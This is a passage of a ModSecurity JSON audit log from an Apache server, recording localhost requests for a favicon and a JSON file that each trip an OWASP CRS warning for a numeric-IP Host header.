[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRdUaX8AAQEAABwRiIEAAAAE\"]"],"stopwatch":{"p1":548,"p2":1164,"p3":57,"p4":136,"p5":51,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:46:01 --0400","transaction_id":"WRdUaX8AAQEAABwRiIIAAAAE","remote_address":"127.0.0.1","remote_port":43734,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdUaX8AAQEAABwRiIIAAAAE\"]"],"stopwatch":{"p1":400,"p2":1170,"p3":49,"p4":440,"p5":239,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:46:01 --0400","transaction_id":"WRdUaX8AAQEAABwRiIMAAAAE","remote_address":"127.0.0.1","remote_port":43734,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdUaX8AAQEAABwRiIMAAAAE\"]"],"stopwatch":{"p1":353,"p2":881,"p3":44,"p4":245,"p5":68,"sr":15,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}